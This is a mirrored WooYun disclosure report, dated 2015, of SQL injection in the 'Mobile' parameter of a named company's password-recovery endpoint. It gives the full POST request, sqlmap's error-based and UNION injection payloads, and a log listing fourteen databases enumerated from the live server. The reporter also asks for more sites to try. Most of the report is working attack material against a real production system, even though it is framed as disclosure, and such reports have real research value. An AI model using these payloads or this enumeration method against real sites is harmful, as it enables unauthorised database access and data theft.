乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-23: 细节已通知厂商并且等待厂商处理中 2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开
········································································································································································································································································································································································
POST数据包:
POST /LogOn/FindMobileCode HTTP/1.1Host: www.meetok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://www.meetok.com/LogOn/DISFindPwdContent-Length: 47Cookie: Hm_lvt_7112016fa110c2353d2ce948e7d84fbc=1434877657; Hm_lpvt_7112016fa110c2353d2ce948e7d84fbc=1434877724X-Forwarded-For: 8.8.8.8'Connection: keep-alivePragma: no-cacheCache-Control: no-cachetype=DISFindBack&Company=DIS&Mobile=13800138000
mobile 参数未过滤(具体参数见下图以及漏洞证明)
14个数据库
疑似通用 你们就不能放几个成功案例的网站让我试试吗?·······
POST parameter 'Mobile' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 48 HTTP(s) requests:---Parameter: Mobile (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: type=DISFindBack&Company=DIS&Mobile=13800138000' AND 4170=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4170=4170) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113))) AND 'wCUp'='wCUp Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: type=DISFindBack&Company=DIS&Mobile=13800138000' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(83)+CHAR(97)+CHAR(109)+CHAR(97)+CHAR(81)+CHAR(77)+CHAR(121)+CHAR(88)+CHAR(72)+CHAR(78)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)-----[17:18:50] [INFO] testing Microsoft SQL Server[17:18:50] [INFO] confirming Microsoft SQL Server[17:18:50] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[17:18:50] [INFO] fetching database names[17:18:50] [INFO] the SQL query used returns 15 entries[17:18:50] [INFO] starting 10 threads[17:18:50] [INFO] retrieved: HHG[17:18:51] [INFO] retrieved: KJ_FX_Web[17:18:51] [INFO] retrieved: master[17:18:51] [INFO] retrieved: hmb2c[17:18:51] [INFO] retrieved: JQG[17:18:51] [INFO] retrieved: meetok_com[17:18:51] [INFO] retrieved: model[17:18:51] [INFO] retrieved: ReportServerTempDB[17:18:51] [INFO] retrieved: msdb[17:18:51] [INFO] retrieved: ReportServer[17:18:51] [INFO] retrieved: tempdb[17:18:51] [INFO] retrieved: TititaTuan_ERP[17:18:51] [INFO] retrieved: Test[17:18:51] [INFO] retrieved: TititaTuan_ERP[17:19:20] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request[17:19:22] [INFO] retrieved: NBSXavailable databases [14]:[*] HHG[*] hmb2c[*] JQG[*] KJ_FX_Web[*] master[*] meetok_com[*] model[*] msdb[*] NBSX[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] Test[*] TititaTuan_ERP[17:19:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.meetok.com'[*] shutting down at 17:19:22
有礼物不?
危害等级:无影响厂商忽略
忽略时间:2015-06-28 15:48
漏洞Rank:4 (WooYun评价)
暂无